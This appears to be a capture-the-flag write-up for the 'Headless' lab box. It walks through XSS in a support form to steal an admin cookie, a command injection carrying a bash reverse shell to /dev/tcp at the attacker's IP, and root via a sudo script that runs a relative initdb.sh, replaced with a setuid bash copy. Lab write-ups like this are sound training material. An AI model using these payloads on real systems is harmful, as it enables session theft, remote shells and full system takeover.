Headless

Recon

nmap_scan.log

HTTP (5000)

It's a python server and we have a submit form on /support, ``

└─$ feroxbuster -u http://10.10.11.8:5000/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.8:5000/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        5l       31w      207c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       93l      179w     2363c http://10.10.11.8:5000/support
200      GET       96l      259w     2799c http://10.10.11.8:5000/
500      GET        5l       37w      265c http://10.10.11.8:5000/dashboard
[####################] - 47s     4729/4729    0s      found:3       errors:0
[####################] - 47s     4728/4728    101/s   http://10.10.11.8:5000/

It's said that we are reported to admins and they will review it, the SSTI didn't work but it did trigger the alarm.

Writeup.png

After testing for XSS we are able to inject and since admin will look at our report we could steal a cookie:

Writeup-1.png

└─$ serve
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.14.37 - - [27/Jul/2024 12:52:46] "GET /? HTTP/1.1" 200 -
10.10.11.8 - - [27/Jul/2024 12:53:58] "GET /?is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 HTTP/1.1" 200 -

Let's assign ourselves the cookie so we can access the /dashboard:

Writeup-2.png

We have a command injection:

Writeup-3.png

Get a reverse connection: date=2023-09-15;bash+-c+'exec+bash+-i+%26>/dev/tcp/10.10.16.74/4444+<%261'%3b

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Headless]
└─$ pwncat -lp 4444
[11:10:50] Welcome to pwncat 🐈!                                                          __main__.py:164
[11:11:35] received connection from 10.10.11.8:44466                                           bind.py:84
[11:11:45] 10.10.11.8:44466: registered new host w/ db                                     manager.py:957
(local) pwncat$
(remote) dvir@headless:/home/dvir/app$ whoami
dvir

User.txt

(remote) dvir@headless:/home/dvir$ cat user.txt
f26c90df3ce8f2512cd9262a909f18f7

-bash-5.2$ sudo -l
Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck
    
-bash-5.2$ cat /usr/bin/syscheck
#!/bin/bash

if [ "$EUID" -ne 0 ]; then
  exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi

exit 0

-bash-5.2$ nano initdb.sh
-bash-5.2$ cat initdb.sh
#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod 4777 /tmp/rootbash

-bash-5.2$ sudo /usr/bin/syscheck

Root.txt

-bash-5.2$ /tmp/rootbash -p
rootbash-5.2# cat root.txt
fa5b0bca103ea07fc198529ca9604b06